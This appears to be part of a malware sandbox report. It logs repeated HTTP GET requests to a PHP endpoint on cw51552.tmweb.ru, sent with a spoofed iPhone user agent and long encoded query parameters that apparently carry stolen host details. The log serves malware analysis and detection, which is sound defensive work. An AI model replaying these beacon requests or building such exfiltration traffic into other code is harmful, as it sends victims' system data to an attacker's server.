Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
